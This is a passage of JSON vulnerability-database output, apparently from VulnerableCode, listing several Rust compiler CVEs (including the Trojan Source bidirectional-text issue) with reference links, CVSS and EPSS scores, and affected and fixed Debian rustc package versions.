"reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4743" }, { "reference_url": "https://www.starwindsoftware.com/security/sw-20220804-0002/", "reference_id": "sw-20220804-0002", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.starwindsoftware.com/security/sw-20220804-0002/" }, { "reference_url": "https://www.unicode.org/reports/tr31/", "reference_id": "tr31", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr31/" }, { "reference_url": "https://www.unicode.org/reports/tr36/", "reference_id": "tr36", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr36/" }, { "reference_url": "https://www.unicode.org/reports/tr39/", "reference_id": "tr39", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr39/" }, { "reference_url": "https://www.unicode.org/reports/tr9/tr9-44.html#HL4", "reference_id": "tr9-44.html#HL4", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr9/tr9-44.html#HL4" }, { "reference_url": "https://www.scyon.nl/post/trojans-in-your-source-code", "reference_id": "trojans-in-your-source-code", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.scyon.nl/post/trojans-in-your-source-code" }, { "reference_url": "https://trojansource.codes", "reference_id": "trojansource.codes", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://trojansource.codes" }, { "reference_url": "http://www.unicode.org/versions/Unicode14.0.0/", "reference_id": "Unicode14.0.0", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.unicode.org/versions/Unicode14.0.0/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938937?format=api", "purl": "pkg:deb/debian/rustc@1.57.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.57.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-42574" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-69zd-gcvx-fuhr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31469?format=api", "vulnerability_id": "VCID-7ap9-xghv-dbdy", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28876", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61752", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61918", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61908", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61926", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61826", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61857", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61827", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61876", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61892", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61913", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61901", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61881", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61924", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61929", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61912", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28876" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949198", "reference_id": "1949198", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949198" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-28876" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7ap9-xghv-dbdy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/84399?format=api", "vulnerability_id": "VCID-7xc5-1vxj-4ua7", "summary": "rust: synchronization problem in the MutexGuard object", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-20004.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-20004.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2017-20004", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47014", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47051", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.4707", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47018", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47073", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47069", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47094", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47068", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47075", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47131", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47126", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47074", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.4706", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47071", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.4702", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2017-20004" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-20004", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-20004" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950390", "reference_id": "1950390", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950390" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938930?format=api", "purl": "pkg:deb/debian/rustc@1.19.0%2Bdfsg3-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.19.0%252Bdfsg3-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2017-20004" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7xc5-1vxj-4ua7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83369?format=api", "vulnerability_id": "VCID-99d1-r35m-6kgw", "summary": "rust: weak synchronization in the Arc::get_mut method", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25008.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25008.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2018-25008", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43809", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43853", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43877", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43807", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43858", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43861", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43879", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43847", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.4383", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43891", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43883", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43816", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43768", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.43771", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00213", "scoring_system": "epss", "scoring_elements": "0.4369", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2018-25008" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25008", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25008" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950392", "reference_id": "1950392", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950392" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938934?format=api", "purl": "pkg:deb/debian/rustc@1.29.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.29.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2018-25008" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-99d1-r35m-6kgw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31474?format=api", "vulnerability_id": "VCID-d8yv-ngej-1kf7", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-31162", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72765", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72913", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72905", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72915", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72773", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72793", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72769", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72808", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72822", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72846", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72829", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72821", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72862", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72873", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72864", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-31162" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950398", "reference_id": "1950398", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950398" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, 